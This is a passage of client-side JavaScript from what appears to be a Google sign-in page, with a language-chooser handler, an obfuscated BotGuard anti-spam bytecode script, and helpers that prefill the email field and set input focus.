  var index = toBeSplit.indexOf(splitChar);
  if (index >= 0) {
  return [toBeSplit.substring(0, index),
  toBeSplit.substring(index + 1)];
  }
  return [toBeSplit];
  }
  var langChooser_parseParams = function(paramsSection) {
  if (paramsSection) {
  var query = {};
  var params = paramsSection.split('&');
  for (var i = 0; i < params.length; i++) {
              var param = splitByFirstChar(params[i], '=');
              if (param.length == 2) {
                query[param[0]] = param[1];
              }
            }
            return query;
          }
          return {};
        }
        var langChooser_getParamStr = function(params) {
          var paramsStr = [];
          for (var a in params) {
            paramsStr.push(a + "=" + params[a]);
          }
          return paramsStr.join('&');
        }
        var langChooser_currentUrl = window.location.href;
        var match = langChooser_currentUrl.match("^(.*?)(\\?(.*?))?(#(.*))?$");
        var langChooser_currentPath = match[1];
        var langChooser_params = langChooser_parseParams(match[3]);
        var langChooser_fragment = match[5];

        var langChooser = document.getElementById('lang-chooser');
        var langChooserWrap = document.getElementById('lang-chooser-wrap');
        var langVisControl = document.getElementById('lang-vis-control');
        if (langVisControl && langChooser) {
          langVisControl.style.display = 'inline';
          langChooser.onchange = function() {
            langChooser_params['lp'] = 1;
            langChooser_params['hl'] = encodeURIComponent(this.value);
            var paramsStr = langChooser_getParamStr(langChooser_params);
            var newHref = langChooser_currentPath + "?" + paramsStr;
            if (langChooser_fragment) {
              newHref = newHref + "#" + langChooser_fragment;
            }
            window.location.href = newHref;
          };
        }
      })();
    </script>
<script type="text/javascript">
  var gaia_attachEvent = function(element, event, callback) {
  if (element.addEventListener) {
  element.addEventListener(event, callback, false);
  } else if (element.attachEvent) {
  element.attachEvent('on' + event, callback);
  }
  };
</script>
  <script type="text/javascript">/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */(function(){eval('var f=function(a,b,c){if(b=typeof a,"object"==b)if(a){if(a instanceof Array)return"array";if(a instanceof Object)return b;if(c=Object.prototype.toString.call(a),"[object Window]"==c)return"object";if("[object Array]"==c||"number"==typeof a.length&&"undefined"!=typeof a.splice&&"undefined"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable("splice"))return"array";if("[object Function]"==c||"undefined"!=typeof a.call&&"undefined"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable("call"))return"function"}else return"null";else if("function"==b&&"undefined"==typeof a.call)return"object";return b},k=function(a,b,c){return 2>=arguments.length?g.slice.call(a,b):g.slice.call(a,b,c)},g=Array.prototype,r=function(a,b,c,d,e){c=a.split("."),d=p,c[0]in d||!d.execScript||d.execScript("var "+c[0]);for(;c.length&&(e=c.shift());)c.length||void 0===b?d=d[e]?d[e]:d[e]={}:d[e]=b},p=this,t,y=(new function(){},function(a,b,c,d,e,h){try{if(this.c=[],u(this,this.b,0),u(this,this.m,0),u(this,this.K,0),u(this,this.k,2048),u(this,this.d,[]),u(this,this.I,"object"==typeof window?window:p),this.F=true,u(this,this.o,{}),u(this,this.h,w(4)),u(this,this.H,[]),u(this,this.v,0),u(this,this.p,0),u(this,this.L,this),u(this,this.A,0),u(this,this.g,[]),a&&"!"==a.charAt(0))this.q=a;else{if(window.atob){for(c=window.atob(a),a=[],e=d=0;e<c.length;e++){for(h=c.charCodeAt(e);255<h;)a[d++]=h&255,h>>=8;a[d++]=h}b=a}else b=null;(this.e=b)&&this.e.length?(this.S=[],this.G()):this.f(this.U)}}catch(l){x(this,l)}}),C=(t=y.prototype,y.prototype.la=function(a,b,c,d){if(3==a.length){for(c=0;3>c;c++)b[c]+=a[c];for(c=0,d=[13,8,13,12,16,5,3,10,15];9>c;c++)b[3](b,c%3,d[c])}},t.L=14,function(a,b,c){if(b=a.a(a.b),!(b in a.e))throw a.f(a.V),a.u;return void 0==a.D&&(a.D=z(a.e,b-4),a.C=void 0),a.C!=b>>3&&(a.C=b>>3,c=[0,0,0,a.a(a.v)],a.ga=B(a.D,a.C,c)),u(a,a.b,b+1),a.e[b]^a.ga[b%8]}),K=(t.O=[function(a,b,c,d){b=C(a),c=C(a),d=C(a),u(a,d,a.a(b)<<c)},function(a){C(a)},function(a,b,c,d){b=C(a),c=C(a),d=C(a),a.a(b)[a.a(c)]=a.a(d)},function(a,b,c){b=C(a),c=C(a),b=a.a(b),u(a,c,f(b))},function(a,b,c){b=C(a),c=C(a),0!=a.a(b)&&u(a,a.b,a.a(c))},function(a,b,c,d,e){b=C(a),c=C(a),d=D(a,b),e=D(a,c),c!=a.g&&(d==a.j&&e==a.j?(void 0==a.c[c]&&u(a,c,""),u(a,c,a.a(c)+a.a(b))):e==a.l&&(0>d?(b=a.a(b),d==a.j&&(b=E(""+b)),F(a,c,G(b.length,2)),F(a,c,b)):0<d&&F(a,c,G(a.a(b),d))))},function(){},function(a,b,c,d){b=C(a),c=C(a),d=C(a),u(a,d,(a.a(b)in a.a(c))+0)},function(){},function(a,b,c,d,e,h,l,n,m){if(b=C(a),c=D(a,b),0<c){for(d=0;c--;)d=d<<8|C(a);u(a,b,d)}else if(c!=a.t){if(d=C(a)<<8|C(a),c==a.j)if(c="",void 0!=a.c[a.w])for(e=a.a(a.w);d--;)h=e[C(a)<<8|C(a)],c+=h;else{for(c=Array(d),e=0;e<d;e++)c[e]=C(a);for(d=c,c=[],h=e=0;e<d.length;)l=d[e++],128>l?c[h++]=String.fromCharCode(l):191<l&&224>l?(n=d[e++],c[h++]=String.fromCharCode((l&31)<<6|n&63)):(n=d[e++],m=d[e++],c[h++]=String.fromCharCode((l&15)<<12|(n&63)<<6|m&63));c=c.join("")}else for(c=Array(d),e=0;e<d;e++)c[e]=C(a);u(a,b,c)}},function(a,b,c,d){b=C(a),c=C(a),d=C(a),u(a,d,a.a(b)|a.a(c))},function(a,b,c,d){b=C(a),c=C(a),d=C(a),u(a,d,a.a(b)>>c)},function(a,b){b=a.a(C(a)),H(a,b)},function(a,b,c,d){if(b=a.S.pop()){for(c=C(a);0<c;c--)d=C(a),b[d]=a.c[d];a.c=b}else u(a,a.b,a.e.length)},function(a,b,c){b=C(a),c=C(a),u(a,c,a.a(c)%a.a(b))},function(a,b,c,d,e){b=C(a),c=C(a),d=a.a(b),b=D(a,b),e=D(a,c),e==a.j||e==a.l?d=""+d:0<b&&(1==b?d&=255:2==b?d&=65535:4==b&&(d&=4294967295)),u(a,c,d)},function(a,b){b=I(a),u(a,b.R,b.P.apply(b.Q,b.n))},function(a,b,c){b=C(a),c=C(a),D(a,c)==a.l?F(a,c,D(a,b)==a.j?E(""+a.a(b)):a.a(b)):u(a,c,a.a(c)+a.a(b))},function(a,b,c,d){b=C(a),c=C(a),d=C(a),a.a(b)>a.a(c)&&u(a,d,a.a(d)+1)},function(a,b,c){b=C(a),c=C(a),u(a,c,a.a(c)*a.a(b))},function(a,b,c,d){b=C(a),c=C(a),d=a.a(C(a)),c=a.a(c),u(a,b,J(a,c,d))},function(a,b,c,d){b=C(a),c=C(a),d=C(a),a.a(b)==a.a(c)&&u(a,d,a.a(d)+1)},function(a,b,c){b=C(a),c=C(a),u(a,c,a.a(c)-a.a(b))},function(a,b,c,d,e){b=C(a),c=C(a),d=C(a),e=a.a(C(a)),c=a.a(c),d=a.a(d),a.a(b).addEventListener(c,J(a,d,e,true),false)},function(a,b,c,d){b=C(a),c=C(a),d=C(a),c=a.a(c),b=a.a(b),u(a,d,b[c])},function(a,b,c,d){b=C(a),c=C(a),d=C(a),u(a,d,a.a(b)||a.a(c))},function(a,b,c){b=C(a),c=C(a),u(a,c,function(a){return eval(a)}(a.a(b)))},function(a,b,c,d,e){b=I(a),e=b.P,d=b.Q,c=b.n;switch(c.length){case 0:c=new d[e];break;case 1:c=new d[e](c[0]);break;case 2:c=new d[e](c[0],c[1]);break;case 3:c=new d[e](c[0],c[1],c[2]);break;case 4:c=new d[e](c[0],c[1],c[2],c[3]);break;default:a.f(a.s);return}u(a,b.R,c)},function(a,b,c,d,e,h){if(b=C(a),c=C(a),d=C(a),e=C(a),b=a.a(b),c=a.a(c),d=a.a(d),a=a.a(e),"object"==f(b)){for(h in e=[],b)e.push(h);b=e}for(e=0,h=b.length;e<h;e+=d)c(b.slice(e,e+d),a)}],t.t=-2,function(a,b,c,d){return c=a.a(a.b),a.e&&c<a.e.length?(u(a,a.b,a.e.length),H(a,b)):u(a,a.b,b),d=a.G(),u(a,a.b,c),d}),u=function(a,b,c){if(b==a.b||b==a.m)a.c[b]?a.c[b].ja(c):a.c[b]=L(c);else if(b!=a.d&&b!=a.h&&b!=a.g||!a.c[b])a.c[b]=M(c,a.a);b==a.v&&(a.D=void 0,u(a,a.b,a.a(a.b)+4))},J=(t.r="caller",t.K=2,function(a,b,c,d){return function(){if(!d||a.F)return u(a,a.J,arguments),u(a,a.o,c),K(a,b)}}),x=(y.prototype.a=function(a,b){if(b=this.c[a],void 0===b)throw this.f(this.X,0,a),this.u;return b()},t.I=8,t.w=16,function(a,b){a.q=("E:"+b.message+":"+b.stack).slice(0,2048)}),G=(t.$=6,function(a,b,c,d){for(d=b-1,c=[];0<=d;d--)c[b-1-d]=a>>8*d&255;return c}),I=(t.ca=10,t.B=4,t.p=12,t.H=3,function(a,b,c,d,e,h){for(b={},c=C(a),b.R=C(a),b.n=[],d=C(a)-1,e=C(a),h=0;h<d;h++)b.n.push(C(a));for(b.P=a.a(c),b.Q=a.a(e);d--;)b.n[d]=a.a(b.n[d]);return b}),B=(t.ea=34,function(a,b,c,d){try{for(d=0;84941944608!=d;)a+=(b<<4^b>>>5)+b^d+c[d&3],d+=2654435769,b+=(a<<4^a>>>5)+a^d+c[d>>>11&3];return[a>>>24,a>>16&255,a>>8&255,a&255,b>>>24,b>>16&255,b>>8&255,b&255]}catch(e){throw e;}}),E=(t.W=33,t.U=17,t.s=22,function(a,b,c,d,e){for(a=a.replace(/\\r\\n/g,"\\n"),b=[],d=c=0;d<a.length;d++)e=a.charCodeAt(d),128>e?b[c++]=e:(2048>e?b[c++]=e>>6|192:(b[c++]=e>>12|224,b[c++]=e>>6&63|128),b[c++]=e&63|128);return b}),H=(t.v=6,t.l=-1,t.d=13,t.o=5,t.da=42,t.Y=17,t.u={},t.Z=36,function(a,b){a.S.push(a.c.slice()),a.c[a.b]=void 0,u(a,a.b,b)}),L=function(a,b,c){return c=function(){return a},b=function(){return c()},b.ja=function(b){a=b},b},D=(t.M="toString",t.A=10,y.prototype.f=function(a,b,c,d){d=this.a(this.m),a=[a,d>>8&255,d&255],void 0!=c&&a.push(c),0==this.a(this.g).length&&(this.c[this.g]=void 0,u(this,this.g,a)),c="",b&&(b.message&&(c+=b.message),b.stack&&(c+=":"+b.stack)),b=this.a(this.k),3<b&&(c=c.slice(0,b-3),b-=c.length+3,c=E(c),F(this,this.h,G(c.length,2).concat(c),this.ba)),u(this,this.k,b)},t.g=9,t.X=30,function(a,b){return b<=a.Y?b==a.g||b==a.d||b==a.h||b==a.H?a.l:b==a.J||b==a.I||b==a.L||b==a.o?a.t:b==a.w?a.j:b==a.k||b==a.A||b==a.b||b==a.m||b==a.B?2:b==a.p?1:4:[1,2,4,a.j,a.t,a.l][b%a.$]}),M=function(a,b,c,d,e,h,l,n,m){return e=y.prototype,h=e.G,d=function(){return c()},m=e.f,n=y,l=e.N,c=function(a,q,v){for(a=d[e.r],v=0,q=a===b,a=a&&a[e.r];a&&a!=h&&a!=l&&a!=n&&a!=m&&20>v;)v++,a=a[e.r];return c[e.ea+q+!(!a+(v>>2))]},d[e.M]=e,c[e.Z]=a,a=void 0,d},z=(y.prototype.ma=function(a,b,c,d){try{d=a[(b+2)%3],a[b]=a[b]-a[(b+1)%3]-d^(1==b?d<<c:d>>>c)}catch(e){throw e;}},function(a,b){return a[b]<<24|a[b+1]<<16|a[b+2]<<8|a[b+3]}),w=(t.h=0,t.b=15,t.k=1,t.V=31,t.J=7,function(a,b){for(b=Array(a);a--;)b[a]=255*Math.random()|0;return b}),F=(y.prototype.na=function(a,b){b.push(a[0]<<24|a[1]<<16|a[2]<<8|a[3]),b.push(a[4]<<24|a[5]<<16|a[6]<<8|a[7]),b.push(a[8]<<24|a[9]<<16|a[10]<<8|a[11])},t.aa=15,t.m=11,t.ba=12,t.j=-3,t.T=21,function(a,b,c,d,e,h){for(e=a.a(b),b=b==a.h?function(b,c,d,h){if(c=e.length,d=c-4>>3,e.ha!=d){e.ha=d,d=(d<<3)-4,h=[0,0,0,a.a(a.K)];try{e.fa=B(z(e,d),z(e,d+4),h)}catch(q){throw q;}}e.push(e.fa[c&7]^b)}:function(a){e.push(a)},d&&b(d&255),h=0,d=c.length;h<d;h++)b(c[h])}),N=function(a,b,c,d){if(8192>a.length)return String.fromCharCode.apply(null,a);for(c=0,b="";c<a.length;c+=8192)d=k(a,c,c+8192),b+=String.fromCharCode.apply(null,d);return b};y.prototype.ka=function(a){return(a=window.performance)&&a.now?function(){return a.now()|0}:function(){return+new Date}}(),y.prototype.ia=function(a,b){return b=this.N(),a&&a(b),b},y.prototype.N=function(a,b,c,d,e,h,l,n,m,A,q){if(this.q)return this.q;try{if(this.F=false,b=this.a(this.d).length,c=this.a(this.h).length,d=this.a(this.k),this.c[this.B]&&K(this,this.a(this.B)),e=this.a(this.g),0<e.length&&F(this,this.d,G(e.length,2).concat(e),this.aa),h=this.a(this.A)&255,h-=this.a(this.d).length+5,l=this.a(this.h),4<l.length&&(h-=l.length+3),0<h&&F(this,this.d,G(h,2).concat(w(h)),this.ca),4<l.length&&F(this,this.d,G(l.length,2).concat(l),this.da),n=w(2).concat(this.a(this.d)),n[1]=n[0]^3,window.btoa?(A=window.btoa(N(n)),m=A=A.replace(/\\+/g,"-").replace(/\\//g,"_").replace(/=/g,"")):m=void 0,m)m="!"+m;else for(e=0,m="";e<n.length;e++)q=n[e][this.M](16),1==q.length&&(q="0"+q),m+=q;this.a(this.d).length=b,this.a(this.h).length=c,u(this,this.k,d),a=m,this.F=true}catch(v){x(this,v),a=this.q}return a},y.prototype.G=function(a,b,c,d,e,h){try{for(c=void 0,d=0,b=5001,a=this.e.length;--b&&(d=this.a(this.b))<a;)try{u(this,this.m,d),e=C(this)%this.O.length,(c=this.O[e])?c(this):this.f(this.T,0,e)}catch(l){l!=this.u&&((h=this.a(this.p))?(u(this,h,l),u(this,this.p,0)):this.f(this.s,l))}b||this.f(this.W)}catch(n){try{this.f(this.s,n)}catch(m){x(this,m)}}return this.a(this.o)};try{window.addEventListener("unload",function(){},false)}catch(O){}r("botguard.bg",y),r("botguard.bg.prototype.invoke",y.prototype.ia);')})()</script>
  <script type="text/javascript">
  document.bg = new botguard.bg('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');
  </script>
<script>
  function gaia_parseFragment() {
  var hash = location.hash;
  var params = {};
  if (!hash) {
  return params;
  }
  var paramStrs = decodeURIComponent(hash.substring(1)).split('&');
  for (var i = 0; i < paramStrs.length; i++) {
      var param = paramStrs[i].split('=');
      params[param[0]] = param[1];
    }
    return params;
  }

  function gaia_prefillEmail() {
    var form = null;
    if (document.getElementById) {
      form = document.getElementById('gaia_loginform');
    }

    if (form && form.Email &&
        (form.Email.value == null || form.Email.value == '')
        && (form.Email.type != 'hidden')) {
      hashParams = gaia_parseFragment();
      if (hashParams['Email'] && hashParams['Email'] != '') {
        form.Email.value = hashParams['Email'];
      }
    }
  }

  
  try {
    gaia_prefillEmail();
  } catch (e) {
  }
  
</script>
<script>
  function gaia_setFocus() {
  var form = null;
  var isFocusableField = function(inputElement) {
  if (!inputElement) {
  return false;
  }
  if (inputElement.type != 'hidden' && inputElement.focus &&
  inputElement.style.display != 'none') {
  return true;
  }
  return false;
  };
  var isFocusableErrorField = function(inputElement) {
  if (!inputElement) {
  return false;
  }
  var hasError = inputElement.className.indexOf('form-error') > -1;
  if (hasError && isFocusableField(inputElement)) {
  return true;
  }
  return false;
  };
  var isFocusableEmptyField = function(inputElement) {
  if (!inputElement) {
  return false;
  }
  var isEmpty = inputElement.value == null || inputElement.value == '';
  if (isEmpty && isFocusableField(inputElement)) {
  return true;
  }
  return false;
  };
  if (document.getElementById) {
  form = document.getElementById('gaia_loginform');
  }
  if (form) {
  var userAgent = navigator.userAgent.toLowerCase();
  var formFields = form.getElementsByTagName('input');
  for (var i = 0; i < formFields.length; i++) {
        var currentField = formFields[i];
        if (isFocusableErrorField(currentField)) {
          currentField.focus();
          
          var currentValue = currentField.value;
          currentField.value = '';
          currentField.value = currentValue;
          return;
        }
      }
      
      
      
        for (var j = 0; j < formFields.length; j++) {
